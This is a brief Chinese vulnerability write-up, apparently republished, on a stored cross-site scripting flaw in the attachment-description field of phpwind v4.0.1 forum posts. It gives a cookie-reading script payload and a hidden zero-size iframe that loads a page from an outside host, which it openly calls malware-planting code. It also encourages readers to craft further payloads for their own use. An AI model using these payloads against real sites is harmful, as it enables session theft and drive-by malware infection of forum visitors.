漏洞程度:高危

漏洞程序:phpwind v4.0.1最新免费版

漏洞描述:利用phpwind v4.0.1论坛的发贴附件上传中的附件描述处插入任意代码!

漏洞利用:

在phpwind v4.0.1发贴/回贴的附件上传处,有个附件描述,在此处插入脚本代码,比如插入:

以下是代码片段：

<SCRIPT>alert(document.cookie)</SCRIPT>

点击提交,发贴/回贴成功后,浏览该贴就会执行插入的代码,没有做过滤,此代码的作用是获取用户的COOKIE信息.看你怎么利用了,代码可以自己构造其它的,经测试,引号是被php过滤了的.结果如图2:

从上图查看源文件可以看出,所插入的代码原样呆在附件描述处,没做过滤!

浏览刚发/回的贴子,结果如下图3:

当然也可以插入框架脚本代码,即我们常说的挂马代码,如: 以下是代码片段：

<IFRAME src="http://gingelly.xinwen365.com/index1.htm" width=0 height=0> </IFRAME>

结果也不用说啦!

（责任编辑：zhaohb）